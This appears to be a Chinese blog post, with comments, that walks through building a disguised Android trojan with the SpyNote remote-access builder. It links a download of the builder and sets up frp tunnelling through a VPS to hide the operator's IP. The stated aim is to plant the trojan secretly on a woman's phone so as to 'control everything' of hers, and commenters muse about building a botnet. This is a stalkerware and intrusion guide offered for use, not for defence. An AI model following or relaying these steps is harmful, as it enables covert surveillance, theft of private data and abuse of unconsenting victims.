我有一个很猥琐的想法:把这个玩意装到妹子的手机里面,神不知鬼不觉。
好吧,首先你得要有一个妹子,并且这个妹子偏爱于Android,而且和你关系不一般,愿意借手机给你玩。。。
再努力一下,这个条件就能满足了,嗯,就快了,就快,快,快了。。。
首先我们得准备一下环境,SpyNote需要的环境如下:
Windows7/8/10系统
.Net4.5.2,下载地址:https://www.microsoft.com/zh-CN/download/details.aspx?id=42642
Java,下载地址:https://www.java.com/zh_CN/
然后就是SpyNote主控了:
链接:https://pan.baidu.com/s/1alLZlxCieoSlVhOlRh6lfw 密码:4h9l
环境和软件都准备好,接下来我们就要利用到昨天写的一篇文章了《frp内网穿透》:https://lala.im/3863.html
不管你现在的网络环境是处于内网还是外网,我都建议使用frp,在这篇文章中,frp可以起到的作用主要是三个:
1.如果你现在是内网,想让SpyNote上线,那就必须做内网穿透,很明显frp是最简单最容易上手的。
2.如果你现在是外网,但是我们都知道现在几大运营商即便给你外网IP了,但是这个IP也不是固定的,一般情况下是24-48小时就会强制重拨换IP。想让你的SpyNote持续/持久上线,那么frp还是必须的。
3.简单的伪装一下你自己的真实IP地址,假如你的木马被人反编译了,别人也只能知道一个你VPS的IP地址,而不会知道你真实的IP地址。
OJBK,假设上面的这些你都已经准备完毕了,那么现在就打开SpyNote,主界面是这样的:
首先,我们点击软件左下角的Listen Port按钮,设置本地监听端口,这里就默认的3210不做更改:
注意这个监听端口要和你frp设置的本地端口号一致。
开启监听后,SpyNote的界面就变成如下图显示的模样了,此时我们点击Build Client开始配置生成木马:
修改APP图标/名字/版本号什么的,自行发挥,越逼真越好:
然后点击Dynamic DNS,这个就是比较关键的地方了,IP这里要填写你的VPS服务器公网IP,端口要填写你的frp配置文件内的远程端口号:
然后就是选择性的开启一下木马的高级功能:
这里额外提及一下Merging App,这个是“捆绑”功能,即你可以把木马APP捆绑到一个正常的APP上,根据需要自己弄吧,我没有配置这个:
全部都设置好了后,点击如图所示的按钮开始生成APP:
此时会弹出一个要你选择文件的窗口,选择SpyNote根目录内的Patch目录,然后选中Patch-release.apk即可:
骚等片刻,APP如果生成成功,SpyNote会自动弹出一个窗口,里面的client.apk就是你的马儿了~
想尽一切办法把这个APP装到妹子手机里吧,我这里就用安卓模拟器随便试试好了:
安装一下:
然后你的老婆就上线了:
功能如下,这已经足够你控制她的一切了:
写在最后:
这个APP的兼容性我不是很清楚,一些基于Android改版的系统,可能运行的不是很顺畅,也有可能运行不了。
另外这个主控有没有后门我也不是很清楚,忘记是从哪个网上面找的了。。。
有点强大 说不定可以做个啥BotNet
太棒了,工具人终于可以发挥猥琐的作用了
压缩包有解压密码》。。。。
压缩包内注释了解压密码。
解压密码打不开了
似乎是有后门的,位置在这里:https://unit42.paloaltonetworks.com/unit42-spynote-android-trojan-builder-leaked/这篇文章里面写的,图三反编译的结果